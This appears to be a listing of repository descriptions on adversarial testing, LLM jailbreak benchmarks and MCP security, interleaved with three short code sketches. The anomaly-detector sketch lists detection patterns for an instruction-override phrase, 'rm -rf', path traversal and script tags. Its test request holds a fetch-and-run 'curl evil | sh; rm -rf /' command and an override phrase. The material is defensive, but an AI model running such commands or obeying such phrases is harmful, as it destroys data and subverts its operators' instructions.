Elenchus MCP Server - Adversarial verification system for code review
AI safety evaluation framework testing LLM epistemic robustness under adversarial self-history manipulation
Benchmark LLM jailbreak resilience across providers with standardized tests, adversarial mode, rich analytics, and a clean Web UI.
Adversarial MCP server benchmark suite for testing tool-calling security, drift detection, and proxy defenses
A multi-agent safety engineering framework that subjects systems to adversarial audit. Orchestrates specialized agents (Engineer, Psychologist, Physicist) to find process risks and human factors.
Extremely hard, multi-turn, open-source-grounded coding evaluations that reliably break every current frontier model (Claude, GPT, Grok, Gemini, Llama, etc.) on numerical stability, zero-allocation, autograd, SIMD, and long-chain correctness.
LLM-powered fuzzing and adversarial testing framework for Solana programs. Generates intelligent attack scenarios, builds real transactions, and reports vulnerabilities with CWE classifications.
A dependency-aware Bayesian belief gate that resists correlated evidence and yields only under true independent verification.
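The core idea behind such a gate can be sketched in a few lines: update belief in log-odds space, but let evidence items that share a provenance tag count only once, so correlated reports cannot compound into false confidence. The sketch below is illustrative only, not the repository's implementation; the `Evidence` fields, the all-or-nothing correlation rule, and the threshold are assumptions made for the example.

```python
from dataclasses import dataclass
from math import log, exp

@dataclass
class Evidence:
    source: str              # provenance tag; items sharing a source are treated as correlated
    likelihood_ratio: float  # P(observation | claim true) / P(observation | claim false)

def belief_gate(prior: float, evidence: list[Evidence], threshold: float = 0.95) -> bool:
    """Update a prior in log-odds space, discounting repeated evidence from one source.

    The first item from a source counts in full; later items from the same source are
    ignored (fully correlated assumption), so the gate yields only when independent
    sources together push the posterior past the threshold.
    """
    log_odds = log(prior / (1.0 - prior))
    seen_sources: set[str] = set()
    for item in evidence:
        if item.source in seen_sources:
            continue  # correlated with evidence already counted; adds nothing new
        seen_sources.add(item.source)
        log_odds += log(item.likelihood_ratio)
    posterior = 1.0 / (1.0 + exp(-log_odds))
    return posterior >= threshold

# Three reports from the same scanner count as one and do not open the gate...
print(belief_gate(0.1, [Evidence("scanner-a", 10.0)] * 3))   # False
# ...but two genuinely independent sources do.
print(belief_gate(0.1, [Evidence("scanner-a", 10.0), Evidence("human-review", 20.0)]))  # True
```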
Investigation into ChatGPT-5 reviewer misalignment: the PDF presented screenshots as evidence, but the assistant denied being able to see them. Includes JSONL and human-readable logs, screenshots, checksums, and video. Highlights structural risks to AI reviewer reliability.
Adversarial testing and robustness evaluation for the Crucible framework
Forensic-style adversarial audit of Google Gemini 2.5 Pro revealing hidden cross-session memory. Includes structured reports, reproducible contracts, SHA-256 checksums, and video evidence of 28-day semantic recall and affective priming. Licensed under CC-BY 4.0.
Analysis of ChatGPT-5 reviewer failure: speculative reasoning disguised as certainty. Captures how an evidence-only review drifted into hypotheses that were later acknowledged as a review-process failure. Includes logs, checksums, screenshots, and external video.
A governance doctrine for AI systems based on explicit oversight. Externalizes trust and uncertainty into auditable, adversarial, and constrainable layers. A design framework, not an implementation guide.
Red team toolkit for stress-testing MCP security scanners — find detection gaps before attackers do
🔒 Simulate adversarial behaviors to test and strengthen MCP defenses without real exploitation or risk, ensuring robust security evaluations.
Generate adversarial pytest tests using an LLM. Tries to find edge cases in your Python code.
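The rough shape of such a pipeline, assuming an OpenAI-style chat-completions client; the prompt wording, model name, and file paths below are illustrative and not the tool's actual interface:

```python
import pathlib
from openai import OpenAI  # assumed client; the actual tool may target a different provider

client = OpenAI()  # reads OPENAI_API_KEY from the environment

PROMPT_TEMPLATE = """You are an adversarial tester. Given the Python module below,
write pytest tests that probe edge cases: empty inputs, extreme values, unicode,
type confusion, and boundary conditions. Output only valid Python code.

Module source:
{source}
"""

def generate_adversarial_tests(module_path: str, out_path: str = "test_adversarial.py") -> None:
    """Ask the model for edge-case pytest tests and write them to a test file."""
    source = pathlib.Path(module_path).read_text()
    response = client.chat.completions.create(
        model="gpt-4o-mini",  # illustrative model choice
        messages=[{"role": "user", "content": PROMPT_TEMPLATE.format(source=source)}],
    )
    pathlib.Path(out_path).write_text(response.choices[0].message.content)

if __name__ == "__main__":
    generate_adversarial_tests("mymodule.py")  # then run: pytest test_adversarial.py
```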
Independent research on ChatGPT-5 reviewer bias. Documents how the AI carried assumptions across PDF versions (v15→v16), wrongly denying evidence despite instructions. Includes JSONL logs, screenshots, checksums, and video evidence. Author: Priyanshu Kumar.
🔒 Implement a security proxy for Model Context Protocol using ensemble anomaly detection to classify requests as benign or attack for enhanced safety.
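The ensemble idea can be illustrated with a few cheap detectors whose scores are averaged into a single verdict. Everything here (the feature checks, thresholds, and method allowlist) is an assumed example for illustration, not the project's actual detector set:

```python
from dataclasses import dataclass
from typing import Callable
import json
import re

@dataclass
class MCPRequest:
    method: str
    params: dict

ALLOWED_METHODS = frozenset({"tools/list", "tools/call", "resources/read"})

# Each detector returns an anomaly score in [0, 1]; the ensemble averages them.
def oversized_payload(req: MCPRequest) -> float:
    return min(len(json.dumps(req.params)) / 50_000, 1.0)  # illustrative size threshold

def suspicious_strings(req: MCPRequest) -> float:
    blob = json.dumps(req.params).lower()
    patterns = [r"ignore (all|previous) instructions", r"\.\./", r"rm -rf", r"<script"]
    hits = sum(bool(re.search(p, blob)) for p in patterns)
    return min(hits / 2, 1.0)

def rare_method(req: MCPRequest) -> float:
    return 0.0 if req.method in ALLOWED_METHODS else 1.0

DETECTORS: list[Callable[[MCPRequest], float]] = [oversized_payload, suspicious_strings, rare_method]

def classify(req: MCPRequest, threshold: float = 0.5) -> str:
    """Average the detector scores and label the request."""
    score = sum(d(req) for d in DETECTORS) / len(DETECTORS)
    return "attack" if score >= threshold else "benign"

print(classify(MCPRequest("tools/list", {})))  # -> benign
print(classify(MCPRequest("debug/exec",
    {"cmd": "curl evil | sh; rm -rf /", "note": "ignore previous instructions"})))  # -> attack
```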